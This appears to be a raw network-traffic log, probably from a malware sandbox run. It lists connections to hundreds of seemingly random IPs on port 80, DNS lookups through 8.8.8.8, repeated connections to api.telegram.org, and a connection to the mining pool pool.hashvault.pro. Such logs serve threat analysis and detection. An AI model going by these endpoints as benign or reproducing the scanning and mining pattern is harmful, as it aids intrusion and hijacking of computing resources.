IR 37.32.35.157:80 tcp
MX 140.99.216.71:80 tcp
US 11.29.165.176:80 tcp
AT 195.202.146.144:80 tcp
US 208.175.116.118:80 tcp
US 156.87.98.31:80 tcp
DE 20.52.239.33:80 tcp
US 99.5.153.123:80 tcp
DE 84.165.163.204:80 tcp
N/A 10.230.146.117:80 tcp
US 16.61.103.10:80 tcp
DE 62.214.24.26:80 tcp
IM 78.24.208.132:80 tcp
RU 85.202.246.205:80 tcp
US 3.224.196.250:80 tcp
DE 62.96.58.215:80 tcp
JP 106.131.35.87:80 tcp
US 67.189.63.179:80 tcp
ES 37.156.109.65:80 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
JP 124.255.33.146:80 tcp
JP 202.61.24.90:80 tcp
US 172.46.194.138:80 tcp
SE 90.232.200.81:80 tcp
ES 149.7.65.56:80 tcp
BR 191.36.234.142:80 tcp
RU 194.226.59.100:80 tcp
US 216.60.208.114:80 tcp
BR 179.105.67.203:80 tcp
IT 151.45.232.123:80 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
FR 81.194.168.179:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 164.181.2.62:80 tcp
GB 109.146.38.19:80 tcp
CL 190.54.140.93:80 tcp
KR 59.4.124.115:80 tcp
US 71.205.251.164:80 tcp
US 21.125.53.26:80 tcp
SG 43.35.20.5:80 tcp
BR 15.228.236.108:80 tcp
US 9.244.80.156:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
CN 36.248.96.136:80 tcp
CN 222.73.164.197:80 tcp
RU 86.102.96.53:80 tcp
JP 150.99.35.196:80 tcp
US 7.145.164.12:80 tcp
US 160.110.251.153:80 tcp
CN 122.49.22.23:80 tcp
US 19.20.241.152:80 tcp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
IL 109.253.218.127:80 tcp
CN 39.97.7.90:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
JP 42.147.243.72:80 tcp
ID 36.90.50.234:80 tcp
MA 105.79.145.40:80 tcp
US 169.3.129.166:80 tcp
DE 84.184.75.127:80 tcp
CO 186.81.6.161:80 tcp
US 23.96.72.123:80 tcp
US 35.142.3.38:80 tcp
NG 105.123.61.149:80 tcp
US 172.223.124.110:80 tcp
ID 36.90.50.234:80 36.90.50.234 tcp
US 8.8.8.8:53 234.50.90.36.in-addr.arpa udp
CN 103.236.99.196:80 tcp
DE 51.214.43.105:80 tcp
AU 58.175.169.109:80 tcp
CN 180.100.167.200:80 tcp
ES 87.111.127.73:80 tcp
CA 142.201.37.127:80 tcp
US 206.63.157.171:80 tcp
US 167.93.17.162:80 tcp
US 214.124.250.163:80 tcp
JP 150.30.45.41:80 tcp
IQ 212.15.87.83:80 tcp
US 35.26.120.112:80 tcp
US 140.11.190.136:80 tcp
CN 123.86.133.126:80 tcp
US 104.175.103.28:80 tcp
JP 158.206.116.50:80 tcp
KR 61.108.64.146:80 tcp
MU 196.194.180.49:80 tcp
CN 110.43.11.206:80 tcp
FR 82.64.219.9:80 tcp
HU 31.46.34.114:80 tcp
CN 110.127.213.234:80 tcp
US 76.103.35.47:80 tcp
KR 168.219.140.121:80 tcp
CN 118.229.24.164:80 tcp
US 48.117.142.60:80 tcp
RU 84.253.103.35:80 tcp
GE 95.104.13.103:80 tcp
KR 223.44.77.3:80 tcp
US 108.89.124.124:80 tcp
US 184.158.7.110:80 tcp
GB 34.89.60.6:80 tcp
NL 145.185.245.141:80 tcp
AU 1.129.154.111:80 tcp
CN 101.227.22.212:80 tcp
IN 101.210.20.38:80 tcp
US 64.123.178.86:80 tcp
EG 154.132.247.82:80 tcp
US 162.180.194.85:80 tcp
US 215.229.57.138:80 tcp
GB 95.151.238.201:80 tcp
US 161.240.240.103:80 tcp
US 32.166.25.116:80 tcp
JP 124.87.18.91:80 tcp
US 140.42.94.234:80 tcp
US 55.176.96.140:80 tcp
CN 106.235.101.225:80 tcp
IN 122.172.247.104:80 tcp
US 32.255.241.94:80 tcp
CH 86.118.9.241:80 tcp
US 141.153.221.51:80 tcp
US 142.129.200.63:80 tcp
US 75.136.115.205:80 tcp
US 159.169.12.177:80 tcp
US 132.172.255.5:80 tcp
US 160.151.29.81:80 tcp
IR 5.106.186.167:80 tcp
US 100.223.182.251:80 tcp
US 4.126.59.172:80 tcp
CN 36.100.255.0:80 tcp
IT 37.226.98.140:80 tcp
US 50.107.68.79:80 tcp
CN 218.10.70.229:80 tcp
US 174.76.94.203:80 tcp
FR 92.163.68.121:80 tcp
US 137.46.47.191:80 tcp
CN 115.197.191.169:80 tcp
US 3.195.126.206:80 tcp
DE 53.154.124.218:80 tcp
US 131.77.93.42:80 tcp
US 192.173.43.182:80 tcp
HU 5.187.146.85:80 tcp
US 8.18.155.9:80 tcp
JP 220.50.85.143:80 tcp
NL 194.45.32.56:80 tcp
CN 113.126.7.83:80 tcp
CH 171.27.93.56:80 tcp
US 136.215.242.252:80 tcp
US 19.223.3.238:80 tcp
ES 154.62.246.52:80 tcp
MU 196.194.255.199:80 tcp
MX 189.128.194.27:80 tcp
US 146.222.196.52:80 tcp
RU 78.138.140.88:80 tcp
US 33.41.129.45:80 tcp
JP 126.255.174.247:80 tcp
CN 39.164.221.37:80 tcp
US 50.220.251.185:80 tcp
MX 189.245.204.142:80 tcp
US 146.151.192.162:80 tcp
US 131.240.154.195:80 tcp
GR 62.38.88.47:80 tcp
US 173.215.50.206:80 tcp
CN 116.138.236.220:80 tcp
US 152.124.10.222:80 tcp
PE 196.19.215.82:80 tcp
NO 88.93.184.145:80 tcp
US 76.60.41.11:80 tcp
JP 175.131.17.118:80 tcp
US 64.169.129.58:80 tcp
CA 96.51.61.250:80 tcp
CN 42.131.63.68:80 tcp
KR 42.32.173.63:80 tcp
US 23.188.90.122:80 tcp
GB 213.5.88.250:80 tcp
US 155.48.182.141:80 tcp
US 144.170.240.208:80 tcp
NL 86.90.201.106:80 tcp
US 48.190.141.169:80 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:443 pool.hashvault.pro tcp
SY 185.246.78.115:80 tcp
GB 90.253.103.9:80 tcp
JP 160.204.81.223:80 tcp
IT 62.101.12.218:80 tcp
CA 72.11.161.73:80 tcp
US 75.131.119.14:80 tcp
TW 165.154.14.161:80 tcp
CN 171.120.77.44:80 tcp
FR 92.161.119.63:80 tcp
SA 5.111.132.98:80 tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
ZA 197.83.22.48:80 tcp
US 7.236.120.148:80 tcp
IT 217.221.9.200:80 tcp
UA 46.96.51.249:80 tcp
US 164.76.143.91:80 tcp
IN 202.54.133.35:80 tcp
US 149.118.38.244:80 tcp
US 184.90.101.160:80 tcp
US 26.57.157.137:80 tcp
AR 186.62.212.243:80 tcp
ES 90.166.177.188:80 tcp
US 43.215.255.253:80 tcp
BR 187.107.200.209:80 tcp
RU 176.52.108.83:80 tcp
CA 38.69.147.106:80 tcp
US 136.166.18.4:80 tcp
US 151.104.211.15:80 tcp
US 23.251.26.34:80 tcp
CN 42.97.42.157:80 tcp
US 97.19.113.232:80 tcp
HR 31.147.74.73:80 tcp
US 66.132.10.136:80 tcp
RO 89.33.35.96:80 tcp
CN 120.248.211.155:80 tcp
CN 101.86.147.183:80 tcp
US 108.122.48.105:80 tcp
GB 94.196.0.26:80 tcp
US 29.92.39.165:80 tcp
US 11.126.88.100:80 tcp
US 161.6.49.130:80 tcp
US 44.176.40.6:80 tcp
KR 14.73.140.250:80 tcp
US 64.95.63.22:80 tcp
US 68.238.24.233:80 tcp
US 104.250.237.239:80 tcp
IT 151.13.0.134:80 tcp
US 12.209.15.133:80 tcp
US 161.249.39.137:80 tcp
CN 123.11.134.107:80 tcp
US 20.132.165.143:80 tcp
US 18.219.186.81:80 tcp
NL 145.81.247.57:80 tcp
US 128.252.215.14:80 tcp
US 214.52.133.7:80 tcp
US 138.98.166.136:80 tcp
DE 53.115.13.100:80 tcp
IN 61.3.58.31:80 tcp
DZ 105.108.211.148:80 tcp
US 208.139.248.205:80 tcp
FR 145.240.57.105:80 tcp
AR 190.138.164.68:80 tcp
US 68.237.133.198:80 tcp
US 209.69.95.9:80 tcp
JP 180.87.32.75:80 tcp
KR 221.154.197.86:80 tcp
US 29.179.33.206:80 tcp
US 48.17.61.168:80 tcp
JP 60.83.15.179:80 tcp
N/A 100.124.70.65:80 tcp
US 99.109.168.7:80 tcp
IT 83.158.92.98:80 tcp
US 209.184.63.30:80 tcp
FR 46.21.123.96:80 tcp
HU 89.223.189.97:80 tcp
US 15.145.55.32:80 tcp
GB 195.172.38.136:80 tcp
NL 194.110.221.7:80 tcp
US 151.181.198.198:80 tcp
US 170.1.157.208:80 tcp
CN 42.100.212.170:80 tcp
KR 115.8.71.79:80 tcp
US 50.3.201.203:80 tcp
US 72.82.12.94:80 tcp
AR 181.21.45.21:80 tcp
JP 133.171.84.2:80 tcp
US 132.198.209.217:80 tcp
US 50.3.201.203:80 50.3.201.203 tcp
US 12.113.219.254:80 tcp
GB 25.233.151.100:80 tcp
ES 81.41.145.196:80 tcp
IN 65.3.89.187:80 tcp
US 8.8.8.8:53 203.201.3.50.in-addr.arpa udp
US 137.159.224.165:80 tcp
US 67.162.98.14:80 tcp
JP 124.36.219.46:80 tcp
AT 84.113.168.163:80 tcp
CN 36.19.52.137:80 tcp
US 51.232.101.217:80 tcp
CN 218.66.112.74:80 tcp
US 69.41.234.142:80 tcp
VN 27.77.3.195:80 tcp
BR 129.148.23.15:80 tcp
US 66.142.244.232:80 tcp
US 137.117.113.130:80 tcp
US 66.142.244.232:80 66.142.244.232 tcp
CN 171.117.76.27:80 tcp
IT 193.206.51.38:80 tcp
US 73.163.94.229:80 tcp
JP 211.125.115.6:80 tcp
US 7.245.255.35:80 tcp
CA 156.11.123.40:80 tcp
US 8.8.8.8:53 232.244.142.66.in-addr.arpa udp
US 56.42.97.233:80 tcp
US 98.157.10.252:80 tcp
US 8.67.80.80:80 tcp
SG 20.198.149.62:80 tcp
US 173.66.214.207:80 tcp
US 66.143.97.23:80 tcp
UA 194.31.46.14:80 tcp
ID 27.112.69.205:80 tcp
BR 187.37.219.248:80 tcp
US 56.137.195.62:80 tcp
UA 194.31.46.14:80 194.31.46.14 tcp
GB 176.105.229.41:80 tcp
US 169.114.36.102:80 tcp
JP 60.81.135.42:80 tcp
CN 60.25.217.94:80 tcp
US 150.241.81.46:80 tcp
CA 99.249.20.255:80 tcp
US 165.15.105.39:80 tcp
US 8.8.8.8:53 14.46.31.194.in-addr.arpa udp
CA 99.216.125.174:80 tcp
US 52.24.68.240:80 tcp
US 136.49.102.84:80 tcp
US 24.192.63.216:80 tcp
US 129.50.221.250:80 tcp
CN 115.230.13.59:80 tcp
EG 196.140.229.90:80 tcp
MX 187.226.54.231:80 tcp
US 22.127.106.12:80 tcp
BR 201.131.147.225:80 tcp
CO 191.66.181.62:80 tcp
HK 156.250.101.35:80 tcp
SG 38.181.52.150:80 tcp
VN 14.176.93.61:80 tcp
US 192.128.42.1:80 tcp
SG 38.181.52.150:80 38.181.52.150 tcp
CN 115.215.81.86:80 tcp
US 38.223.9.17:80 tcp
US 8.8.8.8:53 150.52.181.38.in-addr.arpa udp
SE 13.50.26.141:80 tcp
SE 94.234.226.6:80 tcp
CN 27.225.12.92:80 tcp
DE 53.223.135.79:80 tcp
US 35.60.111.20:80 tcp
US 164.254.235.155:80 tcp
VE 201.209.190.209:80 tcp
US 214.49.221.192:80 tcp
US 29.187.21.245:80 tcp
US 165.237.240.208:80 tcp
CN 42.197.128.214:80 tcp
US 76.205.218.191:80 tcp
GB 31.121.84.239:80 tcp
SG 218.212.209.180:80 tcp
PE 179.7.191.233:80 tcp
US 28.117.38.160:80 tcp
US 51.51.142.252:80 tcp
CN 47.105.232.64:80 tcp
JP 219.112.24.93:80 tcp
US 12.42.206.202:80 tcp
PT 193.126.75.92:80 tcp
US 26.70.96.194:80 tcp
US 158.222.205.24:80 tcp
GB 109.148.216.199:80 tcp
DE 93.208.75.201:80 tcp
US 11.173.5.20:80 tcp
US 26.16.114.33:80 tcp
CA 24.200.203.81:80 tcp
US 153.61.206.154:80 tcp
US 167.76.19.69:80 tcp
KR 218.101.237.215:80 tcp
JP 34.97.234.40:80 tcp
US 71.95.103.135:80 tcp
IN 161.118.240.175:80 tcp
US 24.45.202.130:80 tcp
US 147.0.121.28:80 tcp
BH 56.186.178.139:80 tcp
NO 150.106.101.22:80 tcp
US 206.160.53.170:80 tcp
BR 143.106.154.193:80 tcp
VN 113.183.240.122:80 tcp
DE 46.142.204.224:80 tcp
US 165.203.205.73:80 tcp
SG 43.17.196.31:80 tcp
GB 213.39.62.125:80 tcp
JP 126.172.166.22:80 tcp
US 63.209.85.70:80 tcp
AU 203.54.252.154:80 tcp
US 17.10.4.200:80 tcp
US 12.66.160.10:80 tcp
TH 171.7.67.148:80 tcp
GB 86.137.115.106:80 tcp
US 32.54.108.225:80 tcp
US 11.144.67.177:80 tcp
GT 190.0.219.47:80 tcp
CN 112.91.178.43:80 tcp
US 184.154.226.181:80 tcp
CH 85.7.179.85:80 tcp
CN 118.133.162.214:80 tcp
US 4.64.102.64:80 tcp
US 146.242.232.237:80 tcp
FR 83.207.37.218:80 tcp
KR 168.219.51.8:80 tcp
CN 115.201.223.43:80 tcp
FR 212.195.79.117:80 tcp
LV 213.110.80.150:80 tcp
BR 186.245.243.67:80 tcp
FR 84.102.147.58:80 tcp
GB 51.246.129.177:80 tcp
US 139.161.234.119:80 tcp
AU 3.25.90.244:80 tcp
FR 84.5.134.206:80 tcp
DE 109.192.215.101:80 tcp
CL 200.68.55.147:80 tcp
US 11.23.130.39:80 tcp
US 33.63.149.26:80 tcp
US 215.68.95.159:80 tcp
GB 217.177.89.174:80 tcp
US 104.123.81.87:80 tcp
US 75.29.252.143:80 tcp
CN 114.216.145.144:80 tcp
CN 220.161.17.228:80 tcp
US 57.193.43.24:80 tcp
JP 59.138.47.201:80 tcp
US 7.36.142.64:80 tcp
GR 194.219.112.246:80 tcp
CN 123.74.253.175:80 tcp
GR 194.219.112.246:80 194.219.112.246 tcp
GB 161.35.34.124:80 tcp
GR 194.219.112.246:5000 194.219.112.246 tcp
US 8.8.8.8:53 246.112.219.194.in-addr.arpa udp
US 173.142.234.72:80 tcp
KG 212.241.26.154:80 tcp
US 24.219.116.84:80 tcp
US 131.148.1.154:80 tcp
US 24.156.54.44:80 tcp
TN 102.105.99.195:80 tcp
US 209.178.231.168:80 tcp
MX 177.249.14.214:80 tcp
US 71.57.156.174:80 tcp
US 22.161.14.58:80 tcp
US 13.103.255.47:80 tcp
US 164.204.236.29:80 tcp
DE 130.73.205.235:80 tcp
JP 60.126.88.56:80 tcp
CN 221.173.108.13:80 tcp
MX 187.160.173.93:80 tcp
CN 118.133.121.25:80 tcp
US 66.20.29.102:80 tcp
CN 42.253.94.129:80 tcp
CH 188.154.75.126:80 tcp
CN 115.59.81.68:80 tcp
US 44.126.196.4:80 tcp
AR 181.23.127.104:80 tcp
CN 43.185.46.151:80 tcp
BR 187.59.128.156:80 tcp
IN 183.87.9.115:80 tcp
CN 117.81.5.144:80 tcp
US 26.43.63.147:80 tcp
SA 5.25.73.59:80 tcp
CN 27.204.216.231:80 tcp
US 129.42.115.70:80 tcp
RU 213.165.220.250:80 tcp
CN 202.136.248.241:80 tcp
CN 101.7.203.161:80 tcp
CN 115.52.65.223:80 tcp
US 108.105.221.20:80 tcp
FR 88.183.52.176:80 tcp
DE 195.125.63.185:80 tcp
US 66.99.164.159:80 tcp
MY 161.139.52.238:80 tcp
DE 2.247.199.169:80 tcp
US 55.249.160.181:80 tcp
GB 25.154.113.163:80 tcp
US 32.252.104.115:80 tcp
TH 122.8.153.9:80 tcp
US 156.112.3.48:80 tcp
US 134.88.248.221:80 tcp
US 214.210.66.192:80 tcp
US 67.184.229.78:80 tcp
JP 221.35.153.204:80 tcp
US 155.221.43.235:80 tcp
US 100.164.79.178:80 tcp
MX 187.223.25.114:80 tcp
US 44.56.25.197:80 tcp
NL 31.201.70.19:80 tcp
JP 162.133.96.241:80 tcp
US 13.139.253.82:80 tcp
US 205.98.168.122:80 tcp
IN 122.182.253.4:80 tcp
US 44.134.16.49:80 tcp
EG 156.202.105.230:80 tcp
CN 119.139.81.178:80 tcp
US 129.238.205.110:80 tcp
IN 4.187.69.68:80 tcp
US 131.249.79.3:80 tcp
MZ 41.220.45.202:80 tcp
US 173.90.48.85:80 tcp
US 3.181.140.131:80 tcp
US 136.242.134.12:80 tcp
US 166.135.245.32:80 tcp
GB 31.97.129.8:80 tcp
CN 117.26.230.242:80 tcp
DE 141.71.228.33:80 tcp
JP 132.222.31.64:80 tcp
NL 194.13.239.193:80 tcp
US 44.239.233.232:80 tcp
US 132.1.119.114:80 tcp
CN 114.81.199.73:80 tcp
US 51.88.150.54:80 tcp
US 140.185.3.180:80 tcp
US 146.189.165.161:80 tcp
US 216.143.134.139:80 tcp
US 97.190.56.200:80 tcp
JP 138.64.215.1:80 tcp
KR 125.153.206.120:80 tcp
IT 82.58.189.4:80 tcp
US 208.4.134.166:80 tcp
GB 86.2.105.255:80 tcp
N/A 127.190.2.94:80 tcp
KR 125.128.171.65:80 tcp
RU 46.146.52.243:80 tcp
US 209.209.50.163:80 tcp
US 16.238.140.97:80 tcp
BR 189.106.205.82:80 tcp
HK 1.118.38.6:80 tcp
CY 213.149.167.230:80 tcp
BR 187.67.47.223:80 tcp
CN 182.39.188.196:80 tcp
RU 81.162.28.209:80 tcp
FR 176.140.158.127:80 tcp
CN 59.193.190.129:80 tcp
SA 51.211.200.21:80 tcp
US 69.208.105.211:80 tcp
SE 153.88.49.189:80 tcp
US 169.110.168.118:80 tcp
US 16.153.68.221:80 tcp
US 21.102.27.122:80 tcp
TR 188.38.179.157:80 tcp
KR 118.139.244.182:80 tcp
FR 217.118.233.124:80 tcp
TW 220.228.79.177:80 tcp
CN 110.6.95.13:80 tcp
TW 120.100.251.5:80 tcp
GB 25.197.1.36:80 tcp
JP 202.224.155.129:80 tcp
AU 49.3.247.157:80 tcp
US 52.15.40.17:80 tcp
US 72.182.94.47:80 tcp
GB 25.34.250.185:80 tcp
AU 118.211.33.202:80 tcp
US 75.178.143.247:80 tcp
IN 52.183.155.242:80 tcp
PH 122.54.51.214:80 tcp
US 46.3.56.17:80 tcp
SE 213.113.220.49:80 tcp
JP 133.167.60.223:80 tcp
DK 80.63.207.44:80 tcp
N/A 127.103.32.142:80 tcp
TW 27.243.254.178:80 tcp
US 30.221.197.233:80 tcp
BR 201.70.159.75:80 tcp
KR 14.57.28.119:80 tcp
US 51.129.103.71:80 tcp
US 24.33.15.43:80 tcp
SE 144.57.73.117:80 tcp
US 28.42.233.155:80 tcp
BR 191.213.30.92:80 tcp
US 152.100.122.101:80 tcp
US 155.130.51.121:80 tcp
US 173.161.111.207:80 tcp
US 159.234.128.100:80 tcp
US 129.130.178.217:80 tcp
KR 115.93.60.129:80 tcp
KR 1.18.186.92:80 tcp
ZA 102.249.228.92:80 tcp
IE 87.46.161.71:80 tcp
US 44.167.114.13:80 tcp
CH 83.172.216.122:80 tcp
CA 207.61.3.119:80 tcp
CN 113.121.243.96:80 tcp
CN 120.37.87.17:80 tcp
N/A 10.109.140.90:80 tcp
JP 129.60.50.185:80 tcp
KR 125.247.79.202:80 tcp
DE 87.153.255.169:80 tcp
JP 203.180.69.202:80 tcp
US 69.235.204.179:80 tcp
AU 101.178.99.1:80 tcp
BR 179.136.143.112:80 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
CN 121.35.29.187:80 tcp
US 23.218.120.230:80 tcp
CA 159.32.195.192:80 tcp
MX 148.206.203.221:80 tcp
US 23.218.120.230:80 23.218.120.230 tcp
US 198.149.102.235:80 tcp
N/A 10.56.194.14:80 tcp
US 107.141.169.161:80 tcp
US 97.165.77.245:80 tcp
SA 37.42.169.25:80 tcp
DE 53.252.164.67:80 tcp
SE 176.70.151.165:80 tcp
US 8.8.8.8:53 230.120.218.23.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 104.215.120.179:80 tcp
BR 189.99.117.123:80 tcp
JP 133.57.37.254:80 tcp
JP 133.14.82.37:80 tcp
US 148.25.7.247:80 tcp
BR 177.163.10.199:80 tcp
RO 82.77.183.94:80 tcp
CN 39.102.196.214:80 tcp
GB 147.62.252.176:80 tcp
US 98.188.118.239:80 tcp
NL 213.125.110.185:80 tcp
US 54.184.61.243:80 tcp
IN 103.42.188.133:80 tcp
CN 115.225.178.51:80 tcp
US 48.233.17.173:80 tcp
US 54.184.61.243:80 54.184.61.243 tcp
NG 129.222.205.57:80 tcp
BR 201.18.204.187:80 tcp
US 162.119.18.174:80 tcp
AU 121.215.176.4:80 tcp
US 8.8.8.8:53 243.61.184.54.in-addr.arpa udp
GB 146.169.154.220:80 tcp
CN 112.95.211.93:80 tcp
JP 119.230.62.207:80 tcp
US 7.3.23.45:80 tcp
BR 45.231.63.90:80 tcp
US 44.15.11.27:80 tcp
US 35.15.40.149:80 tcp
US 19.102.244.226:80 tcp
GB 25.32.170.43:80 tcp
VN 118.69.237.216:80 tcp
NO 144.193.166.91:80 tcp
US 21.32.206.154:80 tcp
AR 190.30.2.31:80 tcp
US 178.16.143.149:80 tcp
AU 49.191.94.156:80 tcp
US 54.218.222.250:80 tcp
US 76.115.191.75:80 tcp
BR 186.249.219.134:80 tcp
US 139.88.149.102:80 tcp
US 107.243.102.75:80 tcp
CN 222.216.144.4:80 tcp
EG 197.39.251.189:80 tcp
EG 105.206.252.231:80 tcp
US 71.113.102.124:80 tcp
CN 59.45.239.73:80 tcp
IT 80.204.167.162:80 tcp
BR 177.42.204.181:80 tcp
CA 137.207.59.235:80 tcp
US 173.54.245.32:80 tcp
AR 190.227.214.143:80 tcp
IT 194.243.100.83:80 tcp
NL 86.95.132.53:80 tcp
US 65.182.69.62:80 tcp
US 72.74.29.40:80 tcp
CN 116.213.72.148:80 tcp
BR 187.191.108.181:80 tcp
JP 126.29.137.65:80 tcp
US 145.17.143.39:80 tcp
US 198.128.18.199:80 tcp
CN 47.95.138.70:80 tcp
US 96.29.91.139:80 tcp
US 20.85.218.211:80 tcp
US 12.164.238.191:80 tcp
US 52.149.165.228:80 tcp
GT 181.174.120.137:80 tcp
BR 189.90.242.105:80 tcp
US 44.44.112.108:80 tcp
US 68.5.38.116:80 tcp
MK 77.28.12.15:80 tcp
US 64.29.48.244:80 tcp
US 3.103.165.126:80 tcp
US 7.0.150.140:80 tcp
CN 42.203.156.140:80 tcp
IR 5.113.157.123:80 tcp
SG 94.244.176.49:80 tcp
US 50.77.221.174:80 tcp
CN 111.174.17.90:80 tcp
SE 83.226.251.219:80 tcp
US 9.171.196.190:80 tcp
US 20.179.13.202:80 tcp
KR 112.173.119.247:80 tcp
VN 14.244.4.139:80 tcp
US 4.202.205.179:80 tcp
US 21.223.107.226:80 tcp
US 63.209.200.229:80 tcp
US 19.131.46.246:80 tcp
CN 110.109.43.113:80 tcp
BE 143.129.81.201:80 tcp
DE 93.205.246.175:80 tcp
US 140.17.171.27:80 tcp
CN 103.22.118.162:80 tcp
CN 119.113.22.183:80 tcp
DE 2.161.2.24:80 tcp
US 129.65.67.182:80 tcp
CN 101.197.181.141:80 tcp
US 8.39.200.26:80 tcp
US 216.37.86.161:80 tcp
CN 218.106.88.136:80 tcp
AR 201.234.169.34:80 tcp
AE 31.219.75.143:80 tcp
US 65.190.73.205:80 tcp
US 199.92.111.200:80 tcp
ZA 41.116.53.99:80 tcp
US 70.243.166.219:80 tcp
US 55.109.138.93:80 tcp
US 55.52.53.55:80 tcp
IE 54.77.54.169:80 tcp
CN 1.84.75.159:80 tcp
US 131.189.100.219:80 tcp
US 54.97.24.202:80 tcp
US 216.144.233.206:80 tcp
US 4.83.209.90:80 tcp
MZ 197.235.214.34:80 tcp
ZA 155.239.222.41:80 tcp
DE 129.143.125.24:80 tcp
MX 187.242.17.161:80 tcp
AR 190.229.148.158:80 tcp
US 167.65.24.56:80 tcp
US 67.106.198.234:80 tcp
CN 101.80.19.152:80 tcp
US 74.0.48.235:80 tcp
US 32.61.115.253:80 tcp
KR 39.19.249.32:80 tcp
US 184.172.141.238:80 tcp
GB 81.78.41.32:80 tcp
DE 134.222.253.191:80 tcp
US 72.124.100.223:80 tcp
DE 176.0.250.180:80 tcp
US 8.51.201.82:80 tcp
CL 191.117.80.24:80 tcp
TR 95.9.188.251:80 tcp
DE 217.231.75.90:80 tcp
DE 3.75.171.59:80 tcp
JP 59.138.72.172:80 tcp
US 184.215.122.95:80 tcp
IN 59.162.209.150:80 tcp
US 12.149.79.207:80 tcp
BR 200.214.91.124:80 tcp
US 192.146.84.252:80 tcp
IT 78.4.140.231:80 tcp
EC 190.152.77.67:80 tcp
TW 210.69.153.65:80 tcp
US 50.127.194.59:80 tcp
US 9.36.6.203:80 tcp
US 18.29.255.175:80 tcp
US 130.222.169.66:80 tcp
JP 220.15.52.159:80 tcp
EG 197.126.247.18:80 tcp
IL 109.67.217.118:80 tcp
US 208.91.198.127:80 tcp
US 208.91.198.127:80 208.91.198.127 tcp
ES 84.76.0.19:80 tcp
GB 87.75.248.143:80 tcp
US 8.8.8.8:53 127.198.91.208.in-addr.arpa udp
PL 5.185.127.190:80 tcp
US 73.237.219.73:80 tcp
US 51.177.156.247:80 tcp
IT 31.157.232.178:80 tcp
PT 62.229.71.159:80 tcp
US 204.53.168.25:80 tcp
DE 79.249.169.237:80 tcp
US 29.20.70.76:80 tcp
US 140.194.210.83:80 tcp
CN 112.251.51.209:80 tcp
KR 4.217.239.7:80 tcp
KR 168.249.135.227:80 tcp
JP 157.118.50.199:80 tcp
US 16.255.72.216:80 tcp
NL 2.59.91.125:80 tcp
BR 200.179.172.166:80 tcp
MY 104.76.249.194:80 tcp
US 16.96.228.159:80 tcp
US 164.110.146.252:80 tcp
US 44.112.126.214:80 tcp
US 134.68.79.95:80 tcp
US 56.88.29.26:80 tcp
US 173.116.181.211:80 tcp
US 155.79.133.110:80 tcp
US 168.113.130.214:80 tcp
RU 5.138.195.78:80 tcp
US 72.240.105.29:80 tcp
GB 25.80.4.60:80 tcp
CN 58.43.130.96:80 tcp
US 207.112.163.54:80 tcp
US 32.234.83.240:80 tcp
US 47.5.101.215:80 tcp
CN 115.54.206.16:80 tcp
FR 103.18.158.114:80 tcp
DE 217.0.140.40:80 tcp
QA 37.210.197.51:80 tcp
GB 23.223.126.140:80 tcp
US 137.77.90.160:80 tcp
GB 23.223.126.140:80 23.223.126.140 tcp
US 8.8.8.8:53 140.126.223.23.in-addr.arpa udp
CN 124.42.189.212:80 tcp
US 164.174.124.118:80 tcp
US 152.159.97.255:80 tcp
US 173.40.113.48:80 tcp
US 128.38.161.130:80 tcp
CN 211.163.159.184:80 tcp
CN 115.207.19.58:80 tcp
BS 24.244.161.114:80 tcp
US 96.233.6.167:80 tcp
FI 158.233.189.9:80 tcp
US 208.1.86.0:80 tcp
US 149.114.83.151:80 tcp
US 67.15.103.150:80 tcp
US 33.51.154.152:80 tcp
US 17.40.45.72:80 tcp
CN 175.18.216.137:80 tcp
US 48.53.107.208:80 tcp
CN 110.188.241.193:80 tcp
FR 88.127.208.224:80 tcp
US 30.251.36.225:80 tcp
US 172.79.132.71:80 tcp
NL 195.79.115.164:80 tcp
NO 159.216.56.166:80 tcp
NO 193.90.209.50:80 tcp
IN 122.180.215.201:80 tcp
ES 62.81.81.177:80 tcp
CN 113.50.85.106:80 tcp
CN 14.219.255.93:80 tcp
US 153.102.237.146:80 tcp
ID 36.69.146.59:80 tcp
NO 46.9.244.252:80 tcp
SY 213.178.248.29:80 tcp
US 19.157.135.68:80 tcp
CN 113.57.205.23:80 tcp
CN 203.14.192.117:80 tcp
DE 129.247.119.178:80 tcp
ES 212.166.72.72:80 tcp
CN 183.202.228.233:80 tcp
US 172.2.92.206:80 tcp
US 68.99.164.125:80 tcp
JP 124.45.203.109:80 tcp
AE 40.174.86.224:80 tcp
DE 194.180.30.76:80 tcp
PE 190.42.7.178:80 tcp
IN 103.113.108.168:80 tcp
VN 113.161.190.49:80 tcp
US 56.11.174.194:80 tcp
CA 64.230.91.183:80 tcp
NL 94.170.75.125:80 tcp
TN 197.17.31.162:80 tcp
UA 62.216.62.157:80 tcp
DE 53.35.216.117:80 tcp
US 198.75.34.98:80 tcp
RU 213.85.52.219:80 tcp
AT 144.208.63.50:80 tcp
FR 147.100.132.130:80 tcp
NL 164.140.249.125:80 tcp
US 98.146.83.52:80 tcp
AR 201.180.83.191:80 tcp
US 22.171.165.97:80 tcp
FR 137.74.22.147:80 tcp
FR 137.74.22.147:80 137.74.22.147 tcp
US 192.146.26.124:80 tcp
US 8.8.8.8:53 147.22.74.137.in-addr.arpa udp
US 208.193.165.20:80 tcp
CN 183.15.72.27:80 tcp
CN 36.166.193.137:80 tcp
US 6.166.94.13:80 tcp
JP 57.180.237.245:80 tcp
AU 128.184.218.130:80 tcp
IE 89.127.147.199:80 tcp
IQ 37.238.236.29:80 tcp
SK 88.80.227.81:80 tcp
SK 88.80.227.81:80 88.80.227.81 tcp
US 18.62.17.8:80 tcp
US 8.8.8.8:53 www.nrsys.sk udp
US 8.8.8.8:53 81.227.80.88.in-addr.arpa udp
SK 217.144.21.227:443 www.nrsys.sk tcp
US 56.56.211.126:80 tcp
CN 27.215.187.113:80 tcp
US 66.228.99.212:80 tcp
RU 91.226.95.210:80 tcp
TW 118.171.68.110:80 tcp
AU 185.61.143.228:80 tcp
US 100.53.247.167:80 tcp
US 158.104.202.88:80 tcp
US 21.165.152.183:80 tcp
